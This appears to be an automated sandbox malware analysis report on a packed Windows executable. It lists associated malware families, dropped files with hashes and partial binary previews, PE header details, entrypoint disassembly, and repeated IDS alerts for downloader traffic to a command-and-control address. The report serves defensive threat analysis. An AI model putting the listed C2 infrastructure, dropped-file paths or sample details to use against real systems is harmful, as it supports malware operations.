	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	202.108.0.52
37f463bf4616ecd445d4a1937da06e19	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	202.108.0.52
	CcIlKT6XdC.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse	202.108.0.52
	PO_11100011211.Vbs.vbs	Get hash	malicious	FormBook	Browse	202.108.0.52
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	202.108.0.52
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	202.108.0.52
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	202.108.0.52
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	202.108.0.52

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\ijbbn\gduol.dll	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse
C:\ijbbn\gduol.dll	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\1.txt

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3103
Entropy (8bit):	4.3505239257062005
Encrypted:	false
SSDEEP:	48:EtvVgo8Z3poUXysjp+lENIARV5gwNBOHCy:iVP8ZWUXiy6CUwPby
MD5:	ED33D2536A7DB4D2C6BC515F8F098250
SHA1:	BFA5465CC9748FFCB9305A64639E6B565EB08E17
SHA-256:	D1240271177AA4B205459396EE7746D96E373F70529D2375C102DAAA1D943CBA
SHA-512:	50CFD3A576298DA46075672208EF2220BCE51172207AD65312D851FE8682AC9EA0DB20D36C2897BDBF96CEE2EF3EC39C51712971C5412E03D430276B02C5B537
Malicious:	false
Preview:	..2024-12-11 13:02..iOffset....2024-12-11 14:31..iOffset....2024-12-11 17:33..iOffset....2024-12-11 19:05..iOffset....2024-12-11 22:27..iOffset....2024-12-12 01:39..iOffset....2024-12-12 05:17..iOffset....2024-12-12 07:08..iOffset....2024-12-12 10:51..iOffset....2024-12-12 13:03..iOffset....2024-12-12 16:46..iOffset....2024-12-12 18:28..iOffset....2024-12-12 22:38..iOffset....2024-12-13 03:31..iOffset....2024-12-13 07:24..iOffset....2024-12-13 11:22..iOffset....2024-12-13 14:24..iOffset....2024-12-13 19:08..iOffset....2024-12-13 23:33..iOffset....2024-12-14 04:54..iOffset....2024-12-14 08:40..iOffset....2024-12-14 15:21..iOffset....2024-12-15 02:50..iOffset....2024-12-15 10:12..iOffset....2024-12-15 23:07..iOffset....2024-12-16 03:31..iOffset....2024-12-16 06:29..iOffset....2024-12-16 09:42..iOffset....2024-12-16 13:06..iOffset....2024-12-16 15:36..iOffset....2024-12-16 18:27..iOffset....2024-12-16 20:58..iOffset....2024-12-17 02:36..iOffset....2024-12-17 13:54..iOffset....2024-12-17 1

C:\ijbbn\gduol.dll

Download File

Process:	C:\nfxboms.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	43464
Entropy (8bit):	7.908920555883916
Encrypted:	false
SSDEEP:	768:t0inj1jJ5OeUMhBNSqHvMjjAipMkuG30sv2xEZkWldADAKPIp:t0ipV5uMhBt0jjAiusv22ZkWTOAKP8
MD5:	36E3FB5964D663272CF1169E1E1CA478
SHA1:	58115E08B49505BCBBB5C88A28A86222BA18D5D4
SHA-256:	C7C41689DE030DF0F78F471422FA2A6383B36E77C94E7F6F124A96FEB3E27ED7
SHA-512:	DAFF53B11AA400437A06287707A334A09661C1EF7D0FD8BEAF1A874C79C16FE45BD1188343D0623E839D3EAD5EA2DD90896E37CCF3B252C7220C74989A9BA442
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: nt11qTrX4f.exe, Detection: malicious, Browse Filename: otsIBG7J9b.exe, Detection: malicious, Browse
Preview:	MZ@.....................@.............!.L.!packed by nspack$@...PE..L...u..U...........!................................................................................................. ..8.......x............................ ...............................................................K......................nsp0................................`...nsp1...............................`...............D.................................................... .......K.......................text..................................................UBome........0..........UBome........H...X.................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................z.......z.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.E.4...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....P.a.g.e. .M.a.n.a.g.e.m.e.n.t. .M.o.d.u.l.e. .f.o.r. .S.c.a.n.S.o.f.t. .S.D.K...>.....F.i.l.e.V.e.r.s.i.o.n.....1.4...0...4.7.3.0...

C:\nfxboms.exe

Download File

Process:	C:\Users\user\Desktop\peks66Iy06.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	149723
Entropy (8bit):	7.061428090654756
Encrypted:	false
SSDEEP:	3072:oK4RNx6gb4RoIwZpx10ZENfrGSQ7sDU/ySkNAqJ:ol6exiZuKoDkySkNAy
MD5:	ACEED05E90B445A035B36096437E8A42
SHA1:	CED5C854B2F45F3D34F39D5F4EF5528F8935502B
SHA-256:	D9026559BFD8A9416F21D30FF1A191E915FF958C25D02F34E456DC215B4A1FF3
SHA-512:	2EBAFC42B81667110F4E8F7BDA5DD668E980B75168EA7FD1D240F077360FFF7264933CF6A2DCF5B7E3CEFB9B381CD7E4D4ECF76D0C2F7F9E8863AE47521715C0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ@.....................@....N........!.L.!packed by nspack$@...PE..L...@..U.........................@...C.......P....@..........................`...............................................P.......P..............................................................................................................nsp0.....@.......2..................`...nsp1.........P.......4..............`....imports.....P......................@....................................................................................XR@............ S@...........V..j...1....XS@....R@....H.Q...P@...^..........V........D$..t.V..0.......^.......0..............................8s@...........h..@...2..Y.....8s@...................UVW. p@..\|$..f....TP@.P...R@..-.R@..............D$0..;.}...3...~&S.\$0.........F;..T...T..\|..[_^]....._^]...............f2..SW.....3..\|$..D$...f.j.h....j.j....$$...j.h....P...P@.....u._3.[.......U..$....V.....3..\|$.P.L$..T$.Qh....RS.D$$.......P@..L$...t,.}...$.........t$.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.061256522818147
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	peks66Iy06.exe
File size:	149'686 bytes
MD5:	0d7cb4c47ae6155162d23073a90daae6
SHA1:	2fcb5c0e99853520ea740a94986882383ce1c3fc
SHA256:	063ae487b767c03bb51d34f55e4ce21a0f8f11affff4e094939584f82e8ac727
SHA512:	e96b30bed7c3e8f494d4dda7a56f9da5007856f7b4f8bd60e0d95413310b9b16257f3ddf2a4b82f1b83629a6eb9f5037c7f50febe3c69e959f16eb568b69d888
SSDEEP:	3072:oK4RNx6gb4RoIwZpx10ZENfrGSQ7sDU/ySkNAq:ol6exiZuKoDkySkNA
TLSH:	88E3CFCE2BAACFDBD6205C75D0B412F792669C99DA2147974381FC9DB433CC19D3222A
File Content Preview:	MZ@.....................@....N........!.L.!packed by nspack$@...PE..L...@..U.........................@...C.......P....@..........................`...............................................P.......P.....................................................

File Icon


Icon Hash:	2f756cf369ecd065

Static PE Info

General

Entrypoint:	0x4043ec
Entrypoint Section:	nsp0
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x55F3B340 [Sat Sep 12 05:08:16 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	50653b48ceaf410366f5fbbfa10c793a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00405B28h
push 004043E0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004052CCh]
pop ecx
or dword ptr [004074A4h], FFFFFFFFh
or dword ptr [004074A8h], FFFFFFFFh
call dword ptr [00405270h]
mov ecx, dword ptr [00407498h]
mov dword ptr [eax], ecx
call dword ptr [00405274h]
mov ecx, dword ptr [00407494h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00405278h]
mov eax, dword ptr [eax]
mov dword ptr [004074A0h], eax
call 00007F04786A879Bh
cmp dword ptr [00407330h], ebx
jne 00007F04786A868Eh
push 0040456Eh
call dword ptr [0040527Ch]
pop ecx
call 00007F04786A876Dh
push 00407014h
push 00407010h
call 00007F04786A8758h
mov eax, dword ptr [00407490h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0040748Ch]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00405284h]
push 0040700Ch
push 00407000h
call 00007F04786A8725h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25000	0x8c	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x15000	0xc84	nsp1
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
nsp0	0x1000	0x14000	0x13200	7c639746e2c53437a99e480e3227eaa4	False	0.6932444852941176	data	6.956476287195321	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nsp1	0x15000	0x10000	0xe200	461dde8f27476af68339aa689c7eb6b6	False	0.949910121681416	data	7.886458519780143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.imports	0x25000	0x1000	0x600	58552030faf2e3f62c160600d0c6ea8b	False	0.3483072916666667	data	3.415921246957483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
HTM	0x9754	0xa9c8	data	Chinese	China	0.9755199705503406
RT_ICON	0x8c84	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.10838150289017341
RT_ICON	0x91ec	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.18786127167630057
RT_ICON	0x1571c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.14739884393063585
RT_GROUP_ICON	0x15280	0x14	data			1.25
RT_GROUP_ICON	0x1411c	0x14	data			1.1
RT_GROUP_ICON	0x14130	0x14	data			1.25
RT_VERSION	0x15294	0x488	data	English	United States	0.3741379310344828
None	0x14144	0xaa	data	Chinese	China	0.40588235294117647

Imports

DLL	Import
KERNEL32.DLL	DeleteFileA, CloseHandle, ReadFile, CreateFileA, ExitProcess, WinExec, WriteFile, Sleep, LockResource, SizeofResource, LoadResource, CreateProcessA, GetModuleFileNameA, CreateDirectoryA, FindResourceA, WideCharToMultiByte, lstrlenW, MultiByteToWideChar, lstrlenA, GetModuleHandleA, GetStartupInfoA, GetTickCount
MFC42.DLL
MSVCRT.DLL	_controlfp, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, fopen, fprintf, fclose, _mbsicmp, _mbscmp, __CxxFrameHandler, _except_handler3, srand, rand, __p___argv, _setmbcp, __set_app_type
OLEAUT32.DLL	SysAllocStringLen, SysAllocString, VariantClear, SysFreeString
USER32.DLL	IsIconic, EnableWindow, GetSystemMetrics, wsprintfA, GetClientRect, DrawIcon, GetSystemMenu, AppendMenuA, SendMessageA, LoadIconA
OLE32.DLL	CoInitialize, CoUninitialize

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55955	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63653	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60510	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56130	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51021	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50965	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53634	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51931	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50872	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56129	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51164	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51202	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60698	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51783	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51515	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56486	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51717	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63828	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50927	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61400	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53093	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51790	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60344	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50973	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54065	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60331	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54740	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51554	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52745	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53844	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57231	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51555	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60263	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51724	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50623	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50885	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51005	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54937	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55816	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50945	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54806	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51156	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54328	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57363	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51499	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63468	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63781	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54765	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56123	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57028	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60992	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51441	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57843	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63891	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50865	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57675	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50923	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53303	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51241	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51185	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50897	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51701	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60382	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60528	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51530	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56120	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52929	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63372	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55881	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56326	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51321	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50853	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60163	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63851	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51302	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51037	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58209	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51307	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61625	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52813	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50984	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56117	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56954	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63392	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60797	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51733	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	64077	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50957	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55003	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56098	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60939	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51168	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58049	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50850	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51353	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50939	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55032	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50987	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51165	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61156	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60660	107.163.241.232	12354	TCP
